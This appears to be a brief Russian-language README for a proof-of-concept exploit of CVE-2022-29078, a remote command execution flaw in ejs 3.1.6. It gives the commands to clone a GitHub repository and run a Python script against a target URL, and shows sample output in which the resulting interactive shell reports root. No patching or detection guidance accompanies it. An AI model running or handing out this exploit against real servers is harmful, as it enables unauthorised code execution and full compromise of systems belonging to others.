
Эксплойт для проверки концепции CVE-2022-29078 (ejs 3.1.6), позволяющий удалённое выполнение команд с помощью Python-скрипта. Принимает целевой URL и предоставляет интерактивную оболочку.
Простой PoC для CVE-2022-29078 (уязвимая версия ejs 3.1.6)
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
Появится приглашение для выполнения команд
$ id
uid=0(root) gid=0(root) groupes=0(root)